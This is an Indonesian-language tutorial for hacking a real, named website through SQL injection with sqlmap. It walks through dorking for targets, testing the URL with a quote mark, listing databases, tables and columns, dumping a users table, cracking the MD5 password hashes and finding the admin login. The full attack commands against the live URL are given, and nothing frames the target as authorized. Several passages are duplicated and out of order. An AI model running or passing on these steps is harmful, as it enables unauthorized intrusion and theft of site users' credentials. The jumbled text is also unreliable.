1. Siapkan website target
Dork : sama seperti dork sql injection
Pilih salah satu website yang kalian inginkan, dalam tutorial ini saya memilih
http://www.dkggroup.com/main.php?id=121
2. Buka websitenya , kemudian cek website itu apakah ada vuln SQL, caranya tambahkan tanda '
diakhir url
Misal website target http://www.dkggroup.com/main.php?id=121
tambahkan tanda ' , menjadi http://www.dkggroup.com/main.php?id=121'
3. Kalo muncul pesan "You have an error in your SQL syntax; check the manual ..." berarti ada vuln
SQL
6. Didalam kotak merah digambar diatas adalah nama databasenya, kalo sudah dapat nama
database nya.
kita ketikkan perintah lagi :
[+] python sqlmap.py -u websitetarget -D namadatabase --tables
Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg --tables
Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg -T uvp_Users --columns
Tunggu sampai proses selesai, Setelah selesai kalian akan mendapatkan isi kolom, lihat gambar
dibawah ini.
Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg -T uvp_Users --dump
Kalo ditengah proses ada error/pertanyaan ketik saja "n", lihat gambar dibawah ini.
Setelah kalian ketik n, kalian akan mendapat user+pass website tersebut, lihat gambar dibawah
ini.
Dork : sama seperti dork sql injection
Pilih salah satu website yang kalian inginkan, dalam tutorial ini saya memilih
http://www.dkggroup.com/main.php?id=121
2. Buka websitenya , kemudian cek website itu apakah ada vuln SQL, caranya tambahkan tanda '
diakhir url
Misal website target http://www.dkggroup.com/main.php?id=121
tambahkan tanda ' , menjadi http://www.dkggroup.com/main.php?id=121'
SQL
4. Buka terminal, ketikkan cd /pentest/database/sqlmap/ kemudian tekan enter
5. Ketikkan perintah
[+] python sqlmap.py -u websitetarget --dbs
Contoh website saya adalah http://www.dkggroup.com/main.php?id=121, jadi ketikkan di
terminal :
python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 --dbs
Setelah itu tekan enter dan tunggu proses sampai selesai. Dibawah ini adalah tampilan proses yang
sudah selesai.
database nya.
kita ketikkan perintah lagi :
[+] python sqlmap.py -u websitetarget -D namadatabase --tables
Maka : python sqlmap.py -u http://www.dkggroup.com/main.php?id=121 -D dkg --tables
Setelah itu tekan Enter, tunggu prosesnya sampe selesai. Kalo sudah selesai maka akan tampil
table databasenya.
7. Setelah kalian mendapat table databasenya, silahkan cari table yang menurut kalian berisi
user+pass admin. Kali ini saya coba scan table uvp_Users, perintahnya :
[+] python sqlmap.py -u websitetarget -D namadatabase -T namatable --columns
Tunggu sampai proses selesai, Setelah selesai kalian akan mendapatkan isi kolom, lihat gambar
dibawah ini.
8. Setelah itu scan lagi table untuk mendapat user+pass website tersebut. perintahnya :
[+] python sqlmap.py -u websitetarget -D namadatabase -T namatable --dump
Kalo ditengah proses ada error/pertanyaan ketik saja "n", lihat gambar dibawah ini.
Setelah kalian ketik n, kalian akan mendapat user+pass website tersebut, lihat gambar dibawah
ini.
Didalam kotak merah itu adalah user + password website tersebut, tapi password masih dalam
bentuk md5, decrypt aja kode password itu dengan md5 decrypter, Setelah itu kalian tinggal
mencari admin login ^_^